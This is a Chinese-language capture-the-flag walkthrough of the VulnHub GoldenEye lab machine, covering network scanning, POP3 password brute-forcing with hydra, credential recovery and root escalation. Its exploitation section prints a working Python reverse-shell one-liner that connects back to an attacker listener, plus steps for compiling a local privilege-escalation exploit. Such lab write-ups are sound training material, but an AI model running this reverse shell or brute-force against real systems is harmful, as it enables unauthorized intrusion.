vulnhub-GoldenEye靶机通关wp
大家好,我们是想要为亿人提供安全的亿人安全,这是我们自己想要做的事情,也是做这个公众号的初衷。希望以干货的方式,让大家多多了解这个行业,从中学到对自己有用的芝士~
靶机地址:https://www.vulnhub.com/entry/goldeneye-1,240/
靶机难度:中等(CTF)
目标:得到root权限&找到flag.txt
一、信息收集
1.arp-scan-l 收集目标ip
2.使用命令:nmap -sP 192.168.182.0/24
3.使用命令:nmap -sS -sV -T5 -A -p- 192.168.182.141
4.到/sev-home/目录中。
5.检查主页的html内容以获取任何有用的提示(F12查看)
6.发现了一个用户名和密码,然后发现了一个编码加密
7,使用burp解密模块解密。
8.然后登录
9.然后使用f12查看,发现了pop3服务。POP3服务器的端口:55006、55007。
10.浏览器上访问发现是55007端口。
11.开始生成字典,开始爆破密码。
12.开始使用nc连接,用户:boris 密码:secret1! 用户:natalya 密码:bird
然后开始读邮件
13.使用,用户:natalya 密码:bird,开始读邮件。
14.找到了敏感信息泄露
15.进入/etc/hosts目录,加入severnaya-station.com
用户名:xenia
密码:RCP90rulez!
域:severnaya-station.com
网址:severnaya-station.com/gnocertdir
我们现根据邮件提示添加本地域名:severnaya-station.com
16.本地访问。
17.登录之后,发现一个doak用户
18.加入字典
19.开始爆破用户。
hydra -L x.txt -P /usr/share/wordlists/fasttrack.txt 10.10.10.149 -s 55007 pop3
19.使用nc连接。
20.发现了版本2.2.3的cms。
21.发现了一个敏感文件。
22.发现了目录
23访问一下看看。使用wget下载到本地,wget http://severnaya-station.com/dir007key/for-007.jpg
24.使用binwalk(路由逆向分析工具)、exiftool(图虫)、strings(识别动态库版本指令)等查看图片。
25.发现base64加密。
26.解密。xWinter1995x!
27.使用admin/xWinter1995x! 登录。
28.浏览器搜索历史漏洞。
二 渗透
1.使用msf,查找历史漏洞。
2.设置payload。
3.更改编译环境。
4.使用python脚本提权。
python -c ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“10.10.10.128”,6666));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);
5.kali使用nc监听6666端口
三、提权
1.下载提权脚本。
2.进入文件目录。
3.开启远程文件传输
4.然后在目标机器传输脚本
5.将gcc编译改为cc编译。
6.使用chmod+x权限
使用./exp提权
7.提权成功,然后访问root目录,查看flag。
总结
希望这篇文章可以帮助到你,我也是初学者,希望会的大佬勿喷,如果有错误的地方请指出来,我一定虚心改正。如果有好的方法,大家可以分享出来,多多交流。
- 点赞
- 收藏
- 关注作者
评论(0)